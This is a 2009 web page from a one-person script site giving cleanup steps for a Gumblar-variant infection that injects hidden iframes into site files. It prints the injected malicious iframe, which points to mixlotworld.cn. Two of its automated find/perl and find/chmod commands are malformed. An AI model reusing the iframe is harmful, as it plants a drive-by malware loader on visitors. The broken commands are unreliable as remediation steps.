Main Menu

Downloads

Latest Additions

	DNPL admin search add on
	2.1 patch
	Captcha add-on for DewNewPHPLinks 2.0
	DewNewPHPLinks 2.1.0.1
	Mozilla Firefox Bookmark Importer

Dew-Code Newsfeed

Resources

USdigitalcable.com

More Dew-Code Stuff

Many people seem to the think Dew-Code.com is run by a group of people, or some big corporation. Well, it's flattering if you have that impression, but the truth is, its just one person. While I'd love nothing more than to continue giving away my scripts, my time and experience, I do have the same needs as everyone else. If you've found Dew-Code.com , or any of the scripts found there to be helpful, please consider making a contribution.

For the year 2009, as of 12/16/09, A total of $50 USD has been contributed, or roughly $4.17 per month, for the year. While that is of course appreciated, unless more contributions are received, I will have no choice but to make future scripts available for purchase only.

Regards,
Dewed
Dew-Code.com

Pesky IFRAME added to your site ?

Your server may be the victim of a varient of the Gumblar virus.

In short, a workstation legitimatly uses FTP to connect to your webserver while it is infected
with a trojan/keylogger   What happens afterwards is a bit of a mystery.
Either the workstation itself secretly uploads modified files that include iframes and/or javascript
or the FTP connection info is sent to a hacker who then modifies the files.

Prevention ...
Basically it boils down to changing the password for the affected account from a known clean workstation.
I'd also strongly advise you do away with FTP altogether. With SSH enabled, you can use SCP protocal
and a program like WInSCP (http://winscp.net) to transfer files. Unlike FTP, SCP encrypts usernames and passwords.

Removal ...

Using SSH/shell to access the server directly is about the only way to remove this quickly,
so SSH must be enabled on the server. You can then use a program like PuTTY to connect, available here
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

After connecting, change to your html directory

   cd www [enter]

Locate all files modified within last 1 day . . . You may need to change the 1 to a larger number if the site has been infected for over a day
   find ./ -type f -mtime -1

And/or get a count of files modified within last 24 hours
   find ./ -type f -mtime -1 -print | wc -l

Visually inspect one of the files returned. Usually you'll find the iframe or javascript appended to the opening <BODY tag

<BODY ... ><!-- iframe src="http://mixlotworld.cn:8080/ts/in.cgi?pepsi51" width=125 height=125 style="visibility: hidden"></iframe ->

Sometimes its after the closing body tag.

The web server used as teh iframe source can also vary, in this example mixlotworld.cn

Depending on how many files have been modified, you could manually edit each one using nano, a pretty handly editor...

   nano -w ./index.php
locate and put on it's own line . . . .
<iframe src="http://mixlotworld.cn:8080/ts/in.cgi?pepsi51" width=125 height=125 style="visibility: hidden"></iframe>

cntrl+k delete a whole line..

cntrl+o saves the file

Next, remove unneccsary permissions from teh affected file

   chmod 555 ./index.php

Repeat for every recently modified file

-------- OR, you can automate the removal process using PERL, assuming the iframe target is mixlotworld.cn

   find ./ -type f -mtime -1 | perl -p -i -e 's/<iframe src="http:\/\/mixlotworld.*iframe>//g' {} \;

if the iframe points to some other server, change "mixlotworld" accordingly.

Finally changing the permissions

   find ./ -type f -mtime -1 | chmod 555 {} \;

You'll find further info.. much of it opinion, about the Gumblar virus at the following...
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://www.bleuken.com/2009/05/06/removal-and-prevention-of-gumblarcn-infection/
http://www.iss.net/threats/gumblar.html

Tag it:

Delicious, Digg, MyYahoo, Technorati, Furl and 50 more!

Next >

Freelance Jobs

See more freelance oppurtunities